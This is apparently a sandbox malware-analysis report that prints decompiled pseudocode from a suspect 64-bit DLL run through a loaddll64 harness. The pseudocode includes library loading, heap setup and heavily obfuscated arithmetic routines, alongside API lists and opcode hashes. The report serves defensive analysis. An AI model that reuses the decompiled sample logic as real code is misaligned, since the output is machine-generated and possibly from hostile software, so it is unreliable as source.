				void* _t57;

				_t32 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a32 = __rsi;
				_t48 =  *0x640cd458;
				E00000201201640C908C(0x2d4b080e, __rax,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t32 == 0) goto 0x640c6006;
				LoadLibraryA(??); // executed
				_t35 = _t32;
				goto 0x640c6008;
				if (_t35 == 0) goto 0x640c6048;
				if (E00000201201640C40F8(_t35,  &_a24, _t56, _t57) != 0) goto 0x640c602e;
				_t41 = _a24;
				 *_t41 = _t35;
				 *__rdx = _t41;
				goto 0x640c6066;
				E00000201201640C908C(0xc8e2960c, _t32,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t32 == 0) goto 0x640c6066;
				 *_t32();
				goto 0x640c6066;
				E00000201201640C908C(0xc06f8334, _t32,  *((intOrPtr*)(_t48 + 0x18)));
				if (_t32 == 0) goto 0x640c6061;
				 *_t32();
				goto 0x640c6066;
				return 0x7f;
			}








                                0x201640c5fc8
                                0x201640c5fc8
                                0x201640c5fcd
                                0x201640c5fd2
                                0x201640c5fdc
                                0x201640c5ff2
                                0x201640c5ffa
                                0x201640c5fff
                                0x201640c6001
                                0x201640c6004
                                0x201640c600b
                                0x201640c601e
                                0x201640c6020
                                0x201640c6025
                                0x201640c6028
                                0x201640c602c
                                0x201640c6037
                                0x201640c603f
                                0x201640c6044
                                0x201640c6046
                                0x201640c6051
                                0x201640c6059
                                0x201640c605b
                                0x201640c605f
                                0x201640c607c

                                APIs
                                  • Part of subcall function 00000201640C908C: SetLastError.KERNEL32 ref: 00000201640C90C8
                                • LoadLibraryA.KERNELBASE(?,?,00000000,00000201640C8947,?,?,?,?,?,00000201640C9D9C), ref: 00000201640C5FFF
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: ErrorLastLibraryLoad
                                • String ID:
                                • API String ID: 3568775529-0
                                • Opcode ID: 732c632c0e59d618d2429848589057d7e5eb850a61d6535023b46e3602ede8c6
                                • Instruction ID: b412a4fdd3237899fe9d94b89ef441d6ff93a59f86aa704c517f45b494d6ba40
                                • Opcode Fuzzy Hash: 732c632c0e59d618d2429848589057d7e5eb850a61d6535023b46e3602ede8c6
                                • Instruction Fuzzy Hash: 7A116322315760C7EA309B51F9463AA5264A7C8BC0F3C5831BF4E5774FDE3AD5618314
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EE154 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E00007FFC7FFC130EE154(intOrPtr* __rax, void* __rcx) {
				void* __rbx;

				if (__rcx - 0xffffffe0 > 0) goto 0x130ee19f;
				_t16 =  ==  ? __rax : __rcx;
				goto 0x130ee186;
				if (E00007FFC7FFC130F1374() == 0) goto 0x130ee19f;
				if (E00007FFC7FFC130F0F5C(__rax,  ==  ? __rax : __rcx,  ==  ? __rax : __rcx) == 0) goto 0x130ee19f;
				RtlAllocateHeap(??, ??, ??); // executed
				if (__rax == 0) goto 0x130ee171;
				goto 0x130ee1ac;
				E00007FFC7FFC130EE6A0(__rax);
				 *__rax = 0xc;
				return 0;
			}




                                0x7ffc130ee161
                                0x7ffc130ee16b
                                0x7ffc130ee16f
                                0x7ffc130ee178
                                0x7ffc130ee184
                                0x7ffc130ee192
                                0x7ffc130ee19b
                                0x7ffc130ee19d
                                0x7ffc130ee19f
                                0x7ffc130ee1a4
                                0x7ffc130ee1b1

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 1e315ab79d3799dadb36331b2310a3d77001c73eb90f6160aecb35f2658c2b1a
                                • Instruction ID: 607eead2e2132e49ea425e53871ef1ce691674a1d0f86104ccdfee5b2233db53
                                • Opcode Fuzzy Hash: 1e315ab79d3799dadb36331b2310a3d77001c73eb90f6160aecb35f2658c2b1a
                                • Instruction Fuzzy Hash: 2EF08238F0DA6E45FE5467A55D1027591D04F897B8F180670DD2E752C2DE1CE8A0C130
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201640C6958 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 73%
                                			_entry_(void* __ecx, void* __edx, long long __rcx, void* __r8) {
				void* __rbx;
				void* _t2;
				long long* _t15;
				long long _t16;
				void* _t20;
				long long _t21;
				long long _t22;
				void* _t24;
				void* _t25;

				_t17 = __rcx;
				if (__edx == 0) goto 0x640c697b;
				if (__edx != 1) goto 0x640c6998;
				_t20 = __r8; // executed
				_t2 = E00000201201640C4DB4(_t16, __rcx, _t21, _t22, _t24, _t25); // executed
				if (_t2 == 0) goto 0x640c6998;
				goto 0x640c6998;
				E00000201201640C6CE4(_t15, _t16, _t17, _t20, _t22);
				if ( *0x640cd458 == 0) goto 0x640c6998;
				HeapDestroy(??); // executed
				return 0;
			}












                                0x201640c6958
                                0x201640c6965
                                0x201640c6969
                                0x201640c696b
                                0x201640c696e
                                0x201640c6975
                                0x201640c6979
                                0x201640c697d
                                0x201640c698c
                                0x201640c6992
                                0x201640c699f

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Destroy$AllocCreate
                                • String ID:
                                • API String ID: 3351204586-0
                                • Opcode ID: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                                • Instruction ID: b2ee4f9dc53543178b1ae4f8cdf7856bad762dfa7fd39a985ad539d57471f721
                                • Opcode Fuzzy Hash: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                                • Instruction Fuzzy Hash: A2E06510310360C3FE746A228D9B3F9025CEB80740F286C3CAF0A4628FCA3BD8A58208
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EAE80 Relevance: 1.5, APIs: 1, Instructions: 246COMMON
                                Download Yara Rule
                                C-Code - Quality: 55%
                                			E00007FFC7FFC130EAE80(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, void* __r11) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				void* __r14;
				void* __r15;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				intOrPtr _t177;
				intOrPtr _t195;
				signed int _t203;
				signed int _t212;
				signed int _t224;
				signed int _t227;
				void* _t234;
				long long _t238;
				signed int* _t239;
				long long _t242;
				struct _CRITICAL_SECTION* _t256;
				void* _t259;
				void* _t261;
				void* _t263;
				void* _t264;
				void* _t274;
				void* _t278;
				void* _t280;
				signed int _t281;
				signed int _t282;
				signed long long _t283;
				void* _t285;
				void* _t287;

				_t274 = __r10;
				_t266 = __r8;
				_t241 = __rcx;
				_t237 = __rbx;
				_t234 = __rax;
				 *((long long*)(_t263 + 0x18)) = __rbx;
				_push(_t261);
				_push(_t259);
				_t264 = _t263 - 0x90;
				r8d =  *(_t264 + 0x120);
				r14d = __rdx + 0x566;
				_t195 = __r9 - 0x23f6;
				r11d =  *(_t264 + 0xf8);
				_t7 = _t241 - 0xde7; // 0x27ae
				r11d = r11d + 0x1669;
				 *(_t264 + 0xd0) = r14d;
				r10d = __r8 - 0x1137;
				 *((intOrPtr*)(_t264 + 0xe8)) = _t195;
				_t224 = __rax + 0x61f;
				 *(_t264 + 0x7c) = r10d;
				r12d = __rax - 0x1408;
				 *(_t264 + 0x70) = _t224;
				 *(_t264 + 0xd8) = r12d;
				 *(_t264 + 0x74) = __r8 - 0x18b7;
				_t177 = __r8 - 0x64c;
				r9d = __r8 - 0x4af;
				 *((intOrPtr*)(_t264 + 0x80)) = _t177;
				 *(_t264 + 0x118) =  *(_t264 + 0x108) + 0xffffe9cc;
				 *(_t264 + 0x78) = r9d;
				 *(_t264 + 0x120) =  *(_t264 + 0x110) + 0xffffdefd;
				 *(_t264 + 0x110) = r11d;
				 *(_t264 + 0x108) = _t7;
				if (_t195 - _t278 + 0xd1 > 0) goto 0x130eb204;
				_t281 =  *((intOrPtr*)(_t264 + 0x128));
				r15d = __r11 - 0x15b;
				 *(_t264 + 0x38) = r15d;
				 *(_t264 + 0x30) = __r9 - 0x150e;
				r14d = __rdx + 0x3666;
				 *(_t264 + 0x28) = __r9 + 0x22c;
				 *(_t264 + 0x20) = r15d;
				_t158 = E00007FFC7FFC130E8BF0(r14d, __r9 + 0x15b, __rax, __rbx, __rcx, __rdx, __r8, _t281, __r11, _t287, _t285, _t280, _t278);
				_t40 = _t259 + 0x1033; // 0x37e1
				r10d = _t40;
				r11d = _t278 + 0x25a;
				 *(_t264 + 0x50) = r10d;
				 *(_t264 + 0x48) = _t281;
				 *(_t264 + 0x40) = r11d;
				 *(_t264 + 0x38) = _t177 + 0x7bc;
				r9d = __rdx + 0x10a3;
				 *(_t264 + 0x30) = __rcx + 0x37e1;
				r8d = __rcx + 0x3a59;
				 *(_t264 + 0x28) = __rdx + 0x77c;
				 *(_t264 + 0x20) = _t224 + 0xffffe5d9;
				 *(_t264 + 0x120) = _t158;
				_t159 = E00007FFC7FFC130FCDF0( *(_t264 + 0x110) + 0x4c4, __rax, _t237, __rcx, __rdx, __r8, __r11, _t285);
				r12d = r12d + 0x18b7;
				r9d =  *(_t264 + 0x78);
				r10d =  *(_t264 + 0x70);
				r9d = r9d + 0xffffebf8;
				r10d = r10d + 0xffffed59;
				r8d =  *(_t264 + 0x108);
				r8d = r8d + 0x927;
				 *(_t264 + 0x50) = r14d;
				 *(_t264 + 0x48) = _t159;
				r13d = _t159;
				 *(_t264 + 0x40) =  *(_t264 + 0x120) + 0xfffff40f;
				 *(_t264 + 0x38) = r9d;
				r11d = _t256 + 0x2598;
				 *(_t264 + 0x30) = r10d;
				r9d = r12d;
				 *(_t264 + 0x28) = r11d;
				 *(_t264 + 0x20) =  *(_t264 + 0xd0) + 0x10ce;
				_t238 =  *((intOrPtr*)(_t264 + 0x128));
				_t160 = E00007FFC7FFC130E2A70(_t238, __rcx, _t238, __r8, _t274); // executed
				_t242 =  *((intOrPtr*)(_t238 + 0x23c));
				r11d = _t256 + 0x27ae;
				_t75 = _t281 + 0xea7; // 0xea7
				r10d = _t75;
				r14d =  *(_t264 + 0xd0);
				r15d = _t160;
				r9d =  *(_t264 + 0x120);
				_t78 = _t234 + 0x1669; // 0x1669
				 *((long long*)(_t238 + 0x158)) = _t242;
				_t80 = _t234 + 0x19bd; // 0x19bd
				r8d = _t80;
				_t227 =  *((intOrPtr*)(_t264 + 0x80)) + 0xffffed95;
				 *((intOrPtr*)(_t264 + 0x68)) = _t78;
				r14d = r14d + 0x14c1;
				r9d = r9d + 0x2b1;
				 *(_t264 + 0x60) = r12d;
				 *(_t264 + 0x58) = r8d;
				r8d = r13d;
				_t282 =  *((intOrPtr*)(_t264 + 0x128));
				 *(_t264 + 0x50) = r10d;
				 *(_t264 + 0x48) = r11d;
				 *(_t264 + 0x40) =  *(_t264 + 0x118) + 0x77c;
				 *(_t264 + 0x38) = _t234 + 0x1a27;
				 *(_t264 + 0x30) = _t234 + 0x126b;
				 *(_t264 + 0x28) = _t227;
				 *(_t264 + 0x20) = r14d;
				E00007FFC7FFC130E32C0(_t238, _t242, _t282, _t261, _t266, _t287);
				_t98 = _t287 + 0x360; // 0x360
				r11d =  *(_t264 + 0xd8);
				r9d =  *(_t264 + 0x120);
				r11d = r11d + 0x16b5;
				r10d = _t242 - 0x886;
				 *(_t264 + 0x48) =  *(_t264 + 0x118) + 0xd1;
				r8d = _t242 - 0x6af;
				 *(_t264 + 0x40) = r10d;
				_t203 = _t242 + 0x12a7;
				 *(_t264 + 0x38) = r11d;
				_t212 =  *(_t264 + 0x108) + 0x113b;
				 *(_t264 + 0x30) = _t282;
				r9d = r9d + 0x8d0;
				 *(_t264 + 0x28) = _t98;
				 *(_t264 + 0x20) = _t212;
				E00007FFC7FFC130FD230(_t203, _t234, _t238, _t242, _t282);
				goto 0x130eb37e;
				_t239 =  *((intOrPtr*)(_t264 + 0x128));
				if (_t239[0x24] - _t234 >= 0) goto 0x130eb306;
				_t283 = r14d;
				if (_t239[0x62] - (_t239[0x50] - 0x23f6) * _t283 <= 0) goto 0x130eb306;
				r15d = _t203;
				r12d = r11d;
				r12d = r12d *  *(_t264 + 0x120);
				r15d = r15d ^ r14d;
				r14d =  *(_t264 + 0x118);
				r8d = r12d;
				r9d = _t239[0x48];
				r9d = r9d & 0x00003595;
				r9d = r9d + _t239[0x50];
				 *(_t264 + 0x38) = (_t239[0x70] & r14d) * r9d;
				 *(_t264 + 0x30) = (_t239[0x36] | _t227) + _t239[0x62];
				 *(_t264 + 0x28) = _t239;
				 *(_t264 + 0x20) = r15d;
				E00007FFC7FFC131009D0(_t239[0x62] ^  *_t239, (r14d |  *(_t264 + 0x74)) & 0x00003666, _t239, (_t239[0x50] - 0x23f6) * _t283, _t282, _t239[0x62], _t259, _t261, _t266, _t281, __r11, _t278, _t285, _t287);
				r9d =  *(_t264 + 0x78);
				if (_t212 + 4 - (_t239[0x50] - 0x23f6) * _t283 > 0) goto 0x130eb270;
				r14d =  *(_t264 + 0xd0);
				r12d =  *(_t264 + 0xd8);
				r10d =  *(_t264 + 0x7c);
				r11d =  *(_t264 + 0x110);
				r12d = r12d & r10d;
				if (r14d - r12d > 0) goto 0x130eb378;
				 *(_t264 + 0x28) = _t239[0x2c] * _t239[0x12];
				 *_t239 =  *_t239 | _t239[0x62] - r14d;
				 *(_t264 + 0x20) = __r11 - 0x23f6;
				InitializeCriticalSection(_t256);
				return _t261 - 0x12ab;
			}



































                                0x7ffc130eae80
                                0x7ffc130eae80
                                0x7ffc130eae80
                                0x7ffc130eae80
                                0x7ffc130eae80
                                0x7ffc130eae80
                                0x7ffc130eae85
                                0x7ffc130eae86
                                0x7ffc130eae90
                                0x7ffc130eae97
                                0x7ffc130eae9f
                                0x7ffc130eaead
                                0x7ffc130eaeb4
                                0x7ffc130eaebc
                                0x7ffc130eaec2
                                0x7ffc130eaec9
                                0x7ffc130eaed1
                                0x7ffc130eaed8
                                0x7ffc130eaedf
                                0x7ffc130eaee5
                                0x7ffc130eaeea
                                0x7ffc130eaef1
                                0x7ffc130eaefc
                                0x7ffc130eaf04
                                0x7ffc130eaf08
                                0x7ffc130eaf16
                                0x7ffc130eaf22
                                0x7ffc130eaf29
                                0x7ffc130eaf3c
                                0x7ffc130eaf41
                                0x7ffc130eaf50
                                0x7ffc130eaf58
                                0x7ffc130eaf61
                                0x7ffc130eaf67
                                0x7ffc130eaf76
                                0x7ffc130eaf84
                                0x7ffc130eaf89
                                0x7ffc130eaf8d
                                0x7ffc130eaf94
                                0x7ffc130eafa2
                                0x7ffc130eafaa
                                0x7ffc130eafb6
                                0x7ffc130eafb6
                                0x7ffc130eafc1
                                0x7ffc130eafc9
                                0x7ffc130eafd4
                                0x7ffc130eafdf
                                0x7ffc130eaff0
                                0x7ffc130eaff4
                                0x7ffc130eaffb
                                0x7ffc130eb006
                                0x7ffc130eb013
                                0x7ffc130eb01d
                                0x7ffc130eb021
                                0x7ffc130eb028
                                0x7ffc130eb034
                                0x7ffc130eb03b
                                0x7ffc130eb046
                                0x7ffc130eb04b
                                0x7ffc130eb059
                                0x7ffc130eb060
                                0x7ffc130eb075
                                0x7ffc130eb07c
                                0x7ffc130eb084
                                0x7ffc130eb088
                                0x7ffc130eb08b
                                0x7ffc130eb08f
                                0x7ffc130eb094
                                0x7ffc130eb09b
                                0x7ffc130eb0a0
                                0x7ffc130eb0a3
                                0x7ffc130eb0a8
                                0x7ffc130eb0ac
                                0x7ffc130eb0b7
                                0x7ffc130eb0bc
                                0x7ffc130eb0c3
                                0x7ffc130eb0d1
                                0x7ffc130eb0d1
                                0x7ffc130eb0d8
                                0x7ffc130eb0e0
                                0x7ffc130eb0e3
                                0x7ffc130eb0eb
                                0x7ffc130eb0f1
                                0x7ffc130eb0f8
                                0x7ffc130eb0f8
                                0x7ffc130eb114
                                0x7ffc130eb120
                                0x7ffc130eb124
                                0x7ffc130eb131
                                0x7ffc130eb13e
                                0x7ffc130eb143
                                0x7ffc130eb148
                                0x7ffc130eb14b
                                0x7ffc130eb153
                                0x7ffc130eb15b
                                0x7ffc130eb160
                                0x7ffc130eb164
                                0x7ffc130eb168
                                0x7ffc130eb16c
                                0x7ffc130eb170
                                0x7ffc130eb175
                                0x7ffc130eb17e
                                0x7ffc130eb18c
                                0x7ffc130eb199
                                0x7ffc130eb1a1
                                0x7ffc130eb1af
                                0x7ffc130eb1b6
                                0x7ffc130eb1ba
                                0x7ffc130eb1c1
                                0x7ffc130eb1c6
                                0x7ffc130eb1cc
                                0x7ffc130eb1d1
                                0x7ffc130eb1d7
                                0x7ffc130eb1dc
                                0x7ffc130eb1e3
                                0x7ffc130eb1ed
                                0x7ffc130eb1f1
                                0x7ffc130eb1ff
                                0x7ffc130eb204
                                0x7ffc130eb21e
                                0x7ffc130eb239
                                0x7ffc130eb243
                                0x7ffc130eb249
                                0x7ffc130eb24c
                                0x7ffc130eb24f
                                0x7ffc130eb258
                                0x7ffc130eb25b
                                0x7ffc130eb276
                                0x7ffc130eb28e
                                0x7ffc130eb299
                                0x7ffc130eb2a0
                                0x7ffc130eb2a7
                                0x7ffc130eb2ad
                                0x7ffc130eb2b1
                                0x7ffc130eb2b6
                                0x7ffc130eb2bb
                                0x7ffc130eb2ca
                                0x7ffc130eb2e0
                                0x7ffc130eb2e2
                                0x7ffc130eb2ea
                                0x7ffc130eb2f9
                                0x7ffc130eb2fe
                                0x7ffc130eb306
                                0x7ffc130eb30c
                                0x7ffc130eb352
                                0x7ffc130eb356
                                0x7ffc130eb36d
                                0x7ffc130eb372
                                0x7ffc130eb398

                                APIs
                                • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00007FFC130EB372
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: CriticalInitializeSection
                                • String ID:
                                • API String ID: 32694325-0
                                • Opcode ID: 9df92d1baa61c7f56646a986d98c465c445fbecd55eb9f720856bf70d3a07489
                                • Instruction ID: d13d3fd60ab15f69874901ae012e89e4313c13ae80d127c0e99757a7c7504c2c
                                • Opcode Fuzzy Hash: 9df92d1baa61c7f56646a986d98c465c445fbecd55eb9f720856bf70d3a07489
                                • Instruction Fuzzy Hash: 1CD17D736086C48BC325CF14E440BDEBBA4F788798F144126EB8967B58DB38EA55CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EA4F0 Relevance: 1.5, APIs: 1, Instructions: 208COMMON
                                Download Yara Rule
                                C-Code - Quality: 41%
                                			E00007FFC7FFC130EA4F0(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
				void* __r12;
				void* __r13;
				void* __r14;
				signed int _t153;
				intOrPtr _t185;
				signed int _t194;
				void* _t204;
				signed int _t215;
				intOrPtr _t216;
				long long _t221;
				intOrPtr _t222;
				void* _t232;
				long long _t236;
				void* _t239;
				void* _t240;
				void* _t243;
				struct _CRITICAL_SECTION* _t245;
				void* _t247;
				void* _t249;
				long long _t250;
				signed int _t251;
				void* _t253;

				_t243 = __r9;
				_t231 = __rdx;
				_t204 = __rax;
				 *((long long*)(_t239 + 0x10)) = __rbx;
				 *((long long*)(_t239 + 0x18)) = _t236;
				 *((long long*)(_t239 + 0x20)) = __rsi;
				_push(_t232);
				_t240 = _t239 - 0x90;
				r13d =  *(_t240 + 0x110);
				r11d = __rcx + 0x7bc;
				r14d =  *(_t240 + 0x120);
				r8d =  *(_t240 + 0xe0);
				r9d = _t247 + 0x1137;
				r15d = _t247 - 0x21a;
				r12d =  *(_t240 + 0xf8);
				 *(_t240 + 0x80) = r15d;
				 *(_t240 + 0x120) =  *(_t240 + 0xe8) + 0x40c;
				r10d = _t247 + 0xf35;
				 *(_t240 + 0x110) = r10d;
				 *(_t240 + 0xc0) = r11d;
				r12d = r12d + 0xffffefef;
				if (__r8 - 0x40c - __r9 - 0x17e6 < 0) goto 0x130ea883;
				if (r12d - __rcx - 0x1157 <= 0) goto 0x130ea789;
				 *((intOrPtr*)(_t240 + 0x60)) = __rdx + 0x2103;
				r10d = _t232 + 0x38e9;
				_t250 =  *((intOrPtr*)(_t240 + 0x108));
				 *((long long*)(_t240 + 0x58)) = _t250;
				r11d = _t253 + 0x114f;
				 *(_t240 + 0x50) = r10d;
				r9d = __r8 - 0xde7;
				 *(_t240 + 0x48) = r11d;
				r8d = __rdx + 0x343a;
				 *(_t240 + 0x40) = _t236 + 0x37e1;
				 *(_t240 + 0x38) = _t249 - 0x30d5 + 0x27b2;
				 *(_t240 + 0x30) = _t236 + 0x2103;
				 *(_t240 + 0x28) = __rcx + 0x2b1;
				 *(_t240 + 0x20) = r13d;
				E00007FFC7FFC130E11F0(__rcx, __rdx, __rsi, _t236, __r8, _t245, _t247, _t250); // executed
				r9d =  *(_t240 + 0x110);
				r9d = r9d + 0xffffeeb1;
				 *((long long*)(_t250 + 0x158)) =  *((intOrPtr*)(_t250 + 0x350));
				_t49 = _t204 - 0x814; // -2068
				_t153 = _t49;
				_t51 = _t204 - 0x108; // -264
				r10d = _t51;
				_t53 = _t231 - 0x113b; // -4411
				_t185 = _t53;
				 *(_t240 + 0x78) = r10d;
				_t55 = _t231 - 0x4af; // -1199
				r8d = _t55;
				_t221 =  *((intOrPtr*)(_t250 + 0xe0)) + 0x3595;
				_t194 =  *(_t240 + 0xe0) + 0x24c;
				 *((long long*)(_t250 + 0x58)) = _t221;
				r14d =  *(_t240 + 0xc0);
				r13d =  *(_t240 + 0xe8);
				r11d = _t221 - 0x202;
				 *(_t240 + 0x70) = r11d;
				 *(_t240 + 0x68) = _t153;
				r15d = _t221 - 0x113b;
				_t215 =  *((intOrPtr*)(_t240 + 0x108));
				r12d = _t221 - 0x760;
				 *((intOrPtr*)(_t240 + 0x60)) = _t204 - 0x1563;
				 *((intOrPtr*)(_t240 + 0x58)) = _t185;
				r14d = r14d + 0xffffe5d9;
				 *(_t240 + 0x50) = _t194;
				r13d = r13d + 0x2b1;
				 *(_t240 + 0x48) = r14d;
				 *(_t240 + 0x40) = r15d;
				 *(_t240 + 0x38) = _t215;
				 *(_t240 + 0x30) = r12d;
				 *(_t240 + 0x28) =  *(_t240 + 0x120) + 0xfffff21d;
				 *(_t240 + 0x20) = r13d;
				E00007FFC7FFC130FE7E0(_t221, __rdx, __r8, _t243, _t253, _t249, _t247);
				_t222 =  *((intOrPtr*)(_t215 + 0xd0));
				r15d =  *(_t240 + 0x80);
				 *((short*)(_t215 + 0xf8)) =  *(_t222 + 6) & 0x0000ffff;
				 *((long long*)(_t215 + 0x108)) = _t222 + 0x108;
				 *((intOrPtr*)(_t215 + 0x100)) =  *((intOrPtr*)(_t215 + 0x100)) + _t222 -  *((intOrPtr*)( *((intOrPtr*)(_t215 + 0x1a0)) + 0x100));
				goto 0x130ea93e;
				_t216 =  *((intOrPtr*)(_t240 + 0x108));
				if (r15d - ( *(_t216 + 0x188) |  *(_t216 + 0xb8)) < 0) goto 0x130ea93e;
				r14d = 0x228c;
				r10d = r10d ^ 0x000038e9;
				 *(_t240 + 0x110) = r10d;
				asm("o16 nop [eax+eax]");
				r8d = r10d;
				r8d = r8d *  *(_t216 + 0x120);
				 *(_t240 + 0x20) = _t194 * r9d;
				r9d = ( *(_t216 + 0x228) & 0x0000ffff) * (r8w & 0xffffffff) & 0x0000ffff;
				r9d = r9d * (r11w & 0xffffffff);
				EnterCriticalSection(_t245);
				r8d =  *(_t240 + 0xe0);
				r10d =  *(_t240 + 0x110);
				r11d =  *(_t240 + 0xc0);
				 *(_t216 + 0xe0) =  *(_t216 + 0xe0) | _t185 - (r12d -  *((intOrPtr*)(_t216 + 0x110)) & r15d) ^  *(_t216 + 0x1f8) ^  *(_t216 + 0x1c0);
				if (r15d + 1 - ( *(_t216 + 0x188) |  *(_t216 + 0xb8)) >= 0) goto 0x130ea7d0;
				goto 0x130ea93e;
				_t251 =  *((intOrPtr*)(_t240 + 0x108));
				if (r15d -  *(_t251 + 0xe0) *  *(_t251 + 0x60) * _t153 <= 0) goto 0x130ea93e;
				r11d =  *(_t251 + 0x120);
				r11d = r11d | r8d;
				r10d =  *(_t251 + 0x78);
				r9d =  *_t251;
				r10d = r10d +  *((intOrPtr*)(_t251 + 0x18));
				r9d = r9d - ( *(_t216 + 0x1d0) & 0x0000ffff ^  *(_t216 + 0x130) ^  *(_t216 + 0xa8));
				r8d =  *(_t240 + 0xc0);
				r10d = r10d | 0x00003666;
				 *(_t240 + 0x48) =  *(_t251 + 0x48) * 0x36e7;
				 *(_t240 + 0x40) = ( *(_t251 + 0x100) | 0x00003666) ^  *(_t251 + 0x1b0);
				 *(_t240 + 0x38) = r11d;
				r12d = r12d * (__r8 - 0x40c);
				 *(_t240 + 0x30) = _t251;
				 *(_t240 + 0x28) =  *(_t251 + 0xf0) & r8d;
				 *(_t240 + 0x20) = r10d;
				r8d = r8d + r12d;
				E00007FFC7FFC130FD230(( *(_t216 + 0x1d0) & 0x0000ffff ^  *(_t216 + 0x130) ^  *(_t216 + 0xa8)) -  *_t251 ^  *(_t251 + 0x188), r15d, _t216,  *(_t251 + 0xe0) *  *(_t251 + 0x60) * _t153, __rdx);
				return _t253 + 0x216;
			}

























                                0x7ffc130ea4f0
                                0x7ffc130ea4f0
                                0x7ffc130ea4f0
                                0x7ffc130ea4f0
                                0x7ffc130ea4f5
                                0x7ffc130ea4fa
                                0x7ffc130ea4ff
                                0x7ffc130ea508
                                0x7ffc130ea50f
                                0x7ffc130ea517
                                0x7ffc130ea51e
                                0x7ffc130ea526
                                0x7ffc130ea53c
                                0x7ffc130ea54a
                                0x7ffc130ea551
                                0x7ffc130ea565
                                0x7ffc130ea56d
                                0x7ffc130ea574
                                0x7ffc130ea582
                                0x7ffc130ea590
                                0x7ffc130ea5a5
                                0x7ffc130ea5bc
                                0x7ffc130ea5cb
                                0x7ffc130ea5d7
                                0x7ffc130ea5db
                                0x7ffc130ea601
                                0x7ffc130ea609
                                0x7ffc130ea60e
                                0x7ffc130ea615
                                0x7ffc130ea61a
                                0x7ffc130ea621
                                0x7ffc130ea626
                                0x7ffc130ea634
                                0x7ffc130ea638
                                0x7ffc130ea63c
                                0x7ffc130ea640
                                0x7ffc130ea644
                                0x7ffc130ea649
                                0x7ffc130ea657
                                0x7ffc130ea666
                                0x7ffc130ea66d
                                0x7ffc130ea674
                                0x7ffc130ea674
                                0x7ffc130ea681
                                0x7ffc130ea681
                                0x7ffc130ea68f
                                0x7ffc130ea68f
                                0x7ffc130ea695
                                0x7ffc130ea69a
                                0x7ffc130ea69a
                                0x7ffc130ea6a1
                                0x7ffc130ea6a8
                                0x7ffc130ea6ae
                                0x7ffc130ea6b8
                                0x7ffc130ea6c7
                                0x7ffc130ea6cf
                                0x7ffc130ea6d6
                                0x7ffc130ea6e1
                                0x7ffc130ea6e5
                                0x7ffc130ea6ec
                                0x7ffc130ea6f4
                                0x7ffc130ea6fb
                                0x7ffc130ea704
                                0x7ffc130ea708
                                0x7ffc130ea70f
                                0x7ffc130ea713
                                0x7ffc130ea71a
                                0x7ffc130ea725
                                0x7ffc130ea72a
                                0x7ffc130ea72f
                                0x7ffc130ea734
                                0x7ffc130ea738
                                0x7ffc130ea73d
                                0x7ffc130ea742
                                0x7ffc130ea749
                                0x7ffc130ea755
                                0x7ffc130ea763
                                0x7ffc130ea77d
